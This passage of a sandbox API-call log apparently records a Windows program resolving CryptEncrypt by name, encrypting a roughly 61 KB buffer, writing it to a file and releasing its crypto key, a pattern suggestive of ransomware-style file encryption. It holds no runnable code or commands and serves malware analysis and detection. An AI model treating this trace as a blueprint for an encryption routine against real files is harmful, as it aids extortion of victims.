hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0209.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0209.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab398, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.068] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xef91, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xef98) returned 1 [0209.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.068] CharLowerBuffW (in: lpsz="byte[61336]", cchLength=0xb | out: lpsz="byte[61336]") returned 0xb [0209.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.069] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.069] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.070] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xef91, dwBufLen=0xef98 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xef98) returned 1 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.072] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.072] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.072] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.072] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.072] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.076] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.081] WriteFile (in: hFile=0x524, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xef98, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xef98, lpOverlapped=0x0) returned 1 [0209.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.083] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.083] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.083] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.083] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.083] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.083] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.083] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.083] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.083] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.083] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab050, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.083] CryptDestroyKey (hKey=0x9e2078) returned 1 [0209.083] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.084] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.084] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.084] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.084] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.084] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.084] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.084] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.084] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.089] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.089] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.089] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.089] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.089] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.089] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.089] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.089] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.090] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0209.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.090] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.090] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.091] CloseHandle (hObject=0x510) returned 1 [0209.093] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.093] CloseHandle (hObject=0x524) returned 1 [0209.095] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.097] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 